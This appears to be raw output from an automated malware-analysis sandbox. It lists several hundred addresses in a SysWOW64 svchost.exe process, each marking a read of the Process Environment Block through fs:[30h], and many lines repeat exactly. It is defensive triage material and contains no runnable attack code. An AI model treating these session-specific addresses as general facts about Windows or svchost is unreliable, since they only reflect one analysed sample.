                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]2_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h]2_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]2_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]2_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h]2_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
